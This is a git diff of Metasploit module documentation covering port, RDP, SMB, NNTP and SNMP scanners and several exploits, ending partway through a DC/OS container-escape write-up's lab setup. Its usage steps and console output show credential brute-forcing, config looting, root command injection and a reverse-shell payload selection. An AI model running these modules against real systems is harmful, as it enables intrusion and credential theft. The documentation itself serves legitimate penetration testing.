|
||||||
|
|
||||||
|
[+] Credentials saved in: /root/.msf4/loot/20170616185817_default_172.16.191.166_surgenews.user.c_077983.txt
|
||||||
|
[*] Scanned 2 of 2 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
|
|
@ -9,7 +9,7 @@ The vulnerability is due to insufficient condition checks in the part of the cod
|
||||||
3. Do: ```set RPORT [PORT]```
|
3. Do: ```set RPORT [PORT]```
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf auxiliary(cisco_ike_benigncertain) > show options
|
msf auxiliary(cisco_ike_benigncertain) > show options
|
||||||
|
|
|
@ -0,0 +1,30 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Any system exposing the Cisco Smart Install (SMI) protocol, which typically runs on TCP port 4786.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/misc/cisco_smart_install```
|
||||||
|
2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of SMI
|
||||||
|
3. Do: ```run```
|
||||||
|
4. If the host is exposing an identifiable SMI instance, it will print the endpoint.
|
||||||
|
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf auxiliary(cisco_smart_install) > run
|
||||||
|
|
||||||
|
[*] Scanned 57 of 512 hosts (11% complete)
|
||||||
|
[*] Scanned 105 of 512 hosts (20% complete)
|
||||||
|
[*] Scanned 157 of 512 hosts (30% complete)
|
||||||
|
[*] Scanned 212 of 512 hosts (41% complete)
|
||||||
|
[*] Scanned 256 of 512 hosts (50% complete)
|
||||||
|
[*] Scanned 310 of 512 hosts (60% complete)
|
||||||
|
[*] Scanned 368 of 512 hosts (71% complete)
|
||||||
|
[*] Scanned 413 of 512 hosts (80% complete)
|
||||||
|
[*] Scanned 466 of 512 hosts (91% complete)
|
||||||
|
[+] a.b.c.d:4786 - Fingerprinted the Cisco Smart Install protocol
|
||||||
|
[*] Scanned 512 of 512 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
|
@ -0,0 +1,42 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module attempts to authenticate to NNTP services which support the AUTHINFO authentication extension.
|
||||||
|
|
||||||
|
This module supports AUTHINFO USER/PASS authentication, but does not support AUTHINFO GENERIC or AUTHINFO SASL authentication methods.
|
||||||
|
|
||||||
|
If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
|
||||||
|
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
This module has been tested successfully on:
|
||||||
|
|
||||||
|
* [SurgeNews](http://netwinsite.com/surgenews/) on Windows 7 SP 1.
|
||||||
|
* [SurgeNews](http://netwinsite.com/surgenews/) on Ubuntu Linux.
|
||||||
|
* [INN2](https://www.eyrie.org/~eagle/faqs/inn.html) on Debian Linux.
|
||||||
|
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: `use auxiliary/scanner/nntp/nntp_login`
|
||||||
|
2. Do: `set RHOSTS [IP]`
|
||||||
|
3. Do: `set RPORT [IP]`
|
||||||
|
4. Do: `run`
|
||||||
|
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf auxiliary(nntp_login) > run
|
||||||
|
|
||||||
|
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'asdf' : 'asdf'
|
||||||
|
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'zxcv' : 'zxcv'
|
||||||
|
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'test' : 'test'
|
||||||
|
[*] Scanned 1 of 2 hosts (50% complete)
|
||||||
|
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'asdf' : 'asdf'
|
||||||
|
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'admin' : 'admin'
|
||||||
|
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'user' : 'pass'
|
||||||
|
[*] Scanned 2 of 2 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,59 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module will attempt to initiate a TCP/IP connection with ports on the victim machine. It is this done by sending a SYN packet, and if victim replies with a SYN/ACK packet
|
||||||
|
that means the port is open. Then the attacker sends a RST packet, and as a result the victim's machine assumes that there is a communication error.
|
||||||
|
The attacker now knows the state of port without a full tcp connection. Major benefit of TCP SYN scan is that most logging applications do not log the TCP/RST by default.
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**PORTS**
|
||||||
|
|
||||||
|
This is the list of TCP ports to test on each host.
|
||||||
|
Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
|
||||||
|
options is to scan `1-10000` ports.
|
||||||
|
|
||||||
|
**TIMEOUT**
|
||||||
|
|
||||||
|
Maximum time to wait for a response. The default value is 500 milliseconds.
|
||||||
|
|
||||||
|
**VERBOSE**
|
||||||
|
|
||||||
|
Gives detailed message about the scan of all the ports. It also shows the
|
||||||
|
ports that were closed.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: `use auxiliary/scanner/portscan/syn`
|
||||||
|
2. Do: `set RHOSTS [IP]`
|
||||||
|
3. Do: `set PORTS [PORTS]`
|
||||||
|
4. Do: `run`
|
||||||
|
5. If any of the TCP ports were open they will be discovered, status will be printed indicating as such.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Metaspliotable 2
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/portscan/syn
|
||||||
|
msf auxiliary(syn) > set RHOSTS 192.168.45.159
|
||||||
|
RHOSTS => 192.168.45.159
|
||||||
|
msf auxiliary(syn) > set PORTS 1-10000
|
||||||
|
PORTS => 1-10000
|
||||||
|
msf auxiliary(syn) > run
|
||||||
|
[*] TCP OPEN 192.168.45.159:22
|
||||||
|
[*] TCP OPEN 192.168.45.159:23
|
||||||
|
[*] TCP OPEN 192.168.45.159:111
|
||||||
|
[*] TCP OPEN 192.168.45.159:445
|
||||||
|
[*] TCP OPEN 192.168.45.159:512
|
||||||
|
[*] TCP OPEN 192.168.45.159:513
|
||||||
|
[*] TCP OPEN 192.168.45.159:1099
|
||||||
|
[*] TCP OPEN 192.168.45.159:2121
|
||||||
|
[*] TCP OPEN 192.168.45.159:3306
|
||||||
|
[*] TCP OPEN 192.168.45.159:3632
|
||||||
|
[*] TCP OPEN 192.168.45.159:6000
|
||||||
|
[*] TCP OPEN 192.168.45.159:6697
|
||||||
|
[*] TCP OPEN 192.168.45.159:8009
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
|
||||||
|
```
|
|
@ -0,0 +1,71 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module will enumerate open TCP services by performing a full TCP connect on each port. This will establish a complete three-way handshake (SYN -> SYN/ACK -> ACK) on the target port. This does not need administrative privileges on the source machine, which may be useful if pivoting.
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Any reachable TCP endpoint is a potential target.
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**PORTS**
|
||||||
|
|
||||||
|
This is the list of ports to test for TCP Scan on each host.
|
||||||
|
Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
|
||||||
|
options is to scan `1-10000` ports.
|
||||||
|
|
||||||
|
**ConnectTimeout**
|
||||||
|
|
||||||
|
This options states the maximum number of seconds to establish a tcp
|
||||||
|
connection. Default value if `10`.
|
||||||
|
|
||||||
|
**VERBOSE**
|
||||||
|
|
||||||
|
Gives detailed message about the scan of all the ports. It also shows the
|
||||||
|
ports that were closed.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/portscan/tcp```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set PORTS [PORTS]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Metaspliotable 2
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/portscan/tcp
|
||||||
|
msf auxiliary(tcp) > set RHOSTS 192.168.45.159
|
||||||
|
msf auxiliary(tcp) > set PORTS 1-10000
|
||||||
|
msf auxiliary(tcp) > run
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:25 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:21 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:23 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:22 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:53 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:80 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:111 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:139 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:445 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:513 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:514 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:512 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:1099 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:1524 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:2049 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:2121 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:3306 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:3632 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:5432 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:5900 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:6000 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:6667 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:6697 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:8009 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:8180 - TCP OPEN
|
||||||
|
[*] 192.168.45.159: - 192.168.45.159:8787 - TCP OPEN
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
|
@ -0,0 +1,91 @@
|
||||||
|
# Description
|
||||||
|
|
||||||
|
This module is used to determine if the ports on target machine are closed. It sends probes containing the FIN, PSH and URG flags. Scan is faster and stealthier compared to some other scans. Following action are performed depending on the state of ports -
|
||||||
|
|
||||||
|
#### OPEN|FILTERED Port:
|
||||||
|
Detects open|filtered port via no response to the segment
|
||||||
|
|
||||||
|
#### Closed Port:
|
||||||
|
Detects a closed port via a RST received in response to the FIN
|
||||||
|
|
||||||
|
# Required Permissions
|
||||||
|
|
||||||
|
XMAS scan requires the use of raw sockets, and thus cannot be performed from some Windows
|
||||||
|
systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.
|
||||||
|
|
||||||
|
# Options
|
||||||
|
|
||||||
|
**PORTS**
|
||||||
|
|
||||||
|
This is the list of TCP ports to test on each host.
|
||||||
|
Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
|
||||||
|
options is to scan `1-10000` ports.
|
||||||
|
|
||||||
|
**Timeout**
|
||||||
|
|
||||||
|
This options states the reply read timeout in milliseconds. Default value if `500`.
|
||||||
|
|
||||||
|
**RHOSTS**
|
||||||
|
|
||||||
|
The target address range is defined in this option.
|
||||||
|
|
||||||
|
**VERBOSE**
|
||||||
|
|
||||||
|
Gives detailed message about the scan of all the ports. It also shows the
|
||||||
|
ports that were not open/filtered.
|
||||||
|
|
||||||
|
# Verification Steps
|
||||||
|
|
||||||
|
1. Do: `use auxiliary/scanner/portscan/xmas`
|
||||||
|
2. Do: `set RHOSTS [IP]`
|
||||||
|
3. Do: `set PORTS [PORTS]`
|
||||||
|
4. Do: `run`
|
||||||
|
5. The open/filtered ports will be discovered, status will be printed indicating as such.
|
||||||
|
|
||||||
|
# Scenarios
|
||||||
|
|
||||||
|
### Metaspliotable 2
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/portscan/xmas
|
||||||
|
msf auxiliary(xmas) > set rhosts 192.168.45.159
|
||||||
|
rhosts => 192.168.45.159
|
||||||
|
msf auxiliary(xmas) > set ports 1-100
|
||||||
|
ports => 1-100
|
||||||
|
msf auxiliary(xmas) > run
|
||||||
|
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:1
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:3
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:5
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:8
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:12
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:14
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:16
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:19
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:21
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:37
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:39
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:41
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:43
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:49
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:52
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:53
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:55
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:57
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:59
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:61
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:63
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:65
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:67
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:69
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:73
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:89
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:91
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:93
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:95
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:97
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:99
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
|
||||||
|
```
|
|
@ -0,0 +1,66 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Any system exposing the remote desktop protocol, RDP, typically on 3389/TCP.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/rdp/rdp_scanner```
|
||||||
|
2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of RDP
|
||||||
|
3. Do: ```run```
|
||||||
|
4. If the host is exposing an identifiable RDP instance, it will print the endpoint.
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
There are three options currently supported that control what security protocols to
|
||||||
|
send in the RDP negotiation request, which can be helpful in identifying RDP
|
||||||
|
endpoints that might be locked down or configured differently:
|
||||||
|
|
||||||
|
**TLS** Set to true to request TLS security support
|
||||||
|
**CredSSP** Set to true to request CredSSP support
|
||||||
|
**EarlyUser** Set to true to request Early User Authorization Result PDU support
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf auxiliary(rdp_scanner) > run
|
||||||
|
|
||||||
|
[+] 10.4.18.26:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.22:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.89:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.9:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.67:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.80:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.34:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.70:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.30:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.76:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.13:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.91:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.5:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.47:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.41:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.105:3389 - Identified RDP
|
||||||
|
[*] Scanned 44 of 256 hosts (17% complete)
|
||||||
|
[*] Scanned 55 of 256 hosts (21% complete)
|
||||||
|
[+] 10.4.18.118:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.108:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.139:3389 - Identified RDP
|
||||||
|
[*] Scanned 94 of 256 hosts (36% complete)
|
||||||
|
[*] Scanned 110 of 256 hosts (42% complete)
|
||||||
|
[+] 10.4.18.157:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.166:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.164:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.170:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.185:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.209:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.188:3389 - Identified RDP
|
||||||
|
[*] Scanned 156 of 256 hosts (60% complete)
|
||||||
|
[+] 10.4.18.237:3389 - Identified RDP
|
||||||
|
[+] 10.4.18.225:3389 - Identified RDP
|
||||||
|
[*] Scanned 186 of 256 hosts (72% complete)
|
||||||
|
[*] Scanned 194 of 256 hosts (75% complete)
|
||||||
|
[*] Scanned 208 of 256 hosts (81% complete)
|
||||||
|
[*] Scanned 253 of 256 hosts (98% complete)
|
||||||
|
[*] Scanned 256 of 256 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
|
@ -0,0 +1,55 @@
|
||||||
|
# Description
|
||||||
|
This module scans for hosts that support the SMBv1 protocol. It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects:
|
||||||
|
```PC NETWORK PROGRAM 1.0
|
||||||
|
LANMAN1.0
|
||||||
|
Windows for Workgroups 3.1a
|
||||||
|
LM1.2X002
|
||||||
|
LANMAN2.1
|
||||||
|
NT LM 0.12
|
||||||
|
```
|
||||||
|
If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected.
|
||||||
|
If the SMB server does not support SMBv1 a RST will be sent.
|
||||||
|
|
||||||
|
___
|
||||||
|
# Usage
|
||||||
|
|
||||||
|
The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not.
|
||||||
|
|
||||||
|
#### A host that does support SMBv1.
|
||||||
|
|
||||||
|
```
|
||||||
|
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
|
||||||
|
msf auxiliary(smb1) > set RHOSTS x.x.x.x
|
||||||
|
RHOSTS => x.x.x.x
|
||||||
|
msf auxiliary(smb1) > run
|
||||||
|
|
||||||
|
[+] x.x.x.x:445 - x.x.x.x supports SMBv1 dialect.
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(smb1) > services -S x.x.x.x
|
||||||
|
|
||||||
|
Services
|
||||||
|
========
|
||||||
|
|
||||||
|
host port proto name state info
|
||||||
|
---- ---- ----- ---- ----- ----
|
||||||
|
x.x.x.x 445 tcp smb1 open
|
||||||
|
```
|
||||||
|
|
||||||
|
#### A host that does not support SMBv1
|
||||||
|
|
||||||
|
```
|
||||||
|
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
|
||||||
|
msf auxiliary(smb1) > set RHOSTS y.y.y.y
|
||||||
|
RHOSTS => y.y.y.y
|
||||||
|
msf auxiliary(smb1) > run
|
||||||
|
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
___
|
||||||
|
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation. It can also be set using hosts from the database using ```hosts -R```.
|
|
@ -1,6 +1,8 @@
|
||||||
Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation.
|
Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information.
|
||||||
|
This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation.
|
||||||
|
|
||||||
The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units.
|
The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication.
|
||||||
|
The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units.
|
||||||
|
|
||||||
Note: If the backup url is not retrieved, it is recommended to increase the TIMEOUT and reduce the THREADS. Backup url can also be retrieved by quering the OID as follows:
|
Note: If the backup url is not retrieved, it is recommended to increase the TIMEOUT and reduce the THREADS. Backup url can also be retrieved by quering the OID as follows:
|
||||||
|
|
||||||
|
@ -16,7 +18,7 @@ snmpget -v2c -c public 1.3.3.7 1.3.6.1.4.1.17713.21.6.4.13.0
|
||||||
3. Do: ```set RPORT [PORT]```
|
3. Do: ```set RPORT [PORT]```
|
||||||
4. Do: ```run```
|
4. Do: ```run```
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > use auxiliary/scanner/snmp/epmp_snmp_loot
|
msf > use auxiliary/scanner/snmp/epmp_snmp_loot
|
||||||
|
|
|
@ -14,7 +14,7 @@
|
||||||
5. Do: `run`
|
5. Do: `run`
|
||||||
6. You will hopefully see something similar to, followed by a session:
|
6. You will hopefully see something similar to, followed by a session:
|
||||||
|
|
||||||
````[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '```
|
```[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '```
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,28 @@
|
||||||
|
This module exploits an OS Command Injection vulnerability in Satel SenNet Data Logger and Electricity Meters to perform arbitrary command execution as 'root'.
|
||||||
|
|
||||||
|
The following versions of SenNet Data Logger and Electricity Meters, monitoring platforms, are affected:
|
||||||
|
1. SenNet Optimal DataLogger V5.37c-1.43c and prior,
|
||||||
|
2. SenNet Solar Datalogger V5.03-1.56a and prior, and
|
||||||
|
3. SenNet Multitask Meter V5.21a-1.18b and prior.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/telnet/satel_cmd_exec```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set RPORT [PORT]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Sample Output
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/telnet/satel_cmd_exec
|
||||||
|
msf auxiliary(satel_cmd_exec) > set rhosts 1.3.3.7
|
||||||
|
msf auxiliary(satel_cmd_exec) > run
|
||||||
|
|
||||||
|
[*] 1.3.3.7:5000 - Sending command now - id;
|
||||||
|
[+] 1.3.3.7:5000 - uid=0(root) gid=0(root)
|
||||||
|
[+] 1.3.3.7:5000 - File saved in: /root/.msf4/loot/20000000000003_1.3.3.7_cmdexeclog_12345.txt
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
|
||||||
|
```
|
|
@ -187,7 +187,7 @@ finish
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
||||||
Just a standard run.
|
Just a standard run.
|
||||||
|
```
|
||||||
msf > use exploit/linux/http/centreon_useralias_exec
|
msf > use exploit/linux/http/centreon_useralias_exec
|
||||||
msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
|
msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
|
||||||
payload => cmd/unix/reverse_python
|
payload => cmd/unix/reverse_python
|
||||||
|
|
|
@ -0,0 +1,192 @@
|
||||||
|
# Vulnerable Application
|
||||||
|
Utilizing the DCOS Cluster's Marathon UI, an attacker can create
|
||||||
|
a docker container with the '/' path mounted with read/write
|
||||||
|
permissions on the host server that is running the docker container.
|
||||||
|
As the docker container executes command as uid 0 it is honored
|
||||||
|
by the host operating system allowing the attacker to edit/create
|
||||||
|
files owed by root. This exploit abuses this to creates a cron job
|
||||||
|
in the '/etc/cron.d/' path of the host server.
|
||||||
|
|
||||||
|
*Notes: The docker image must be a valid docker image from
|
||||||
|
hub.docker.com. Further more the docker container will only
|
||||||
|
deploy if there are resources available in the DC/OS
|
||||||
|
|
||||||
|
## DCOS
|
||||||
|
This Exploit was tested with CentOS 7 as the host operating system for
|
||||||
|
the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with
|
||||||
|
Default 'custom' installation for on site premise setup. Only the Install
|
||||||
|
part of the DCOS guide was completed, the system hardening and securing
|
||||||
|
your cluster section where skipped. This is to represent a 'Default' install
|
||||||
|
with a system admin conducting hasty deployments taking no thought about security.
|
||||||
|
|
||||||
|
|
||||||
|
## To Setup Your Cluster
|
||||||
|
I recommend doing a 'on-premise'/custom
|
||||||
|
cluster. https://dcos.io/docs/1.8/administration/installing/custom/
|
||||||
|
Create a virtual CentOS machine, install requirements base on the above
|
||||||
|
guide.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# The TLDR from the above guide
|
||||||
|
sudo systemctl stop firewalld && sudo systemctl disable firewalld
|
||||||
|
sudo yum install -y tar xz unzip curl ipset ntp
|
||||||
|
sudo systemctl start ntpd
|
||||||
|
sudo systemctl enable ntpd
|
||||||
|
sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \
|
||||||
|
sudo groupadd nogroup && sudo reboot
|
||||||
|
```
|
||||||
|
|
||||||
|
Install a supported version of docker on the CentOS systems
|
||||||
|
https://dcos.io/docs/1.8/administration/installing/custom/system-requirements/install-docker-centos/
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# The TLDR of the above guide
|
||||||
|
sudo yum -y remove docker docker-common container-selinux
|
||||||
|
sudo yum -y remove docker-selinux
|
||||||
|
sudo yum install -y yum-utils
|
||||||
|
sudo yum-config-manager \
|
||||||
|
--add-repo \
|
||||||
|
https://docs.docker.com/engine/installation/linux/repo_files/centos/docker.repo
|
||||||
|
sudo yum-config-manager --enable docker-testing
|
||||||
|
sudo yum makecache fast
|
||||||
|
sudo yum -y install docker-engine-1.11.2
|
||||||
|
sudo systemctl start docker
|
||||||
|
sudo systemctl enable docker
|
||||||
|
sudo echo overlay > /etc/modules-load.d/overlay.conf
|
||||||
|
sudo reboot
|
||||||
|
```
|
||||||
|
|
||||||
|
Once the CentOS machine has rebooted, edit the systemctl
|
||||||
|
service file for docker and change the ExecStart- line to
|
||||||
|
`ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://`
|
||||||
|
restart the docker service and verify it is running.
|
||||||
|
lastly generate ssh rsa keys for authentication. And update the
|
||||||
|
/etc/ssh/sshd_config file to support root login.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ssh-keygen -t rsa -b 4096
|
||||||
|
# Press enter until complete, DO NOT PUT A PASSWORD.
|
||||||
|
cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys
|
||||||
|
cat ~/.ssh/id_rsa # save the output you will need it for later
|
||||||
|
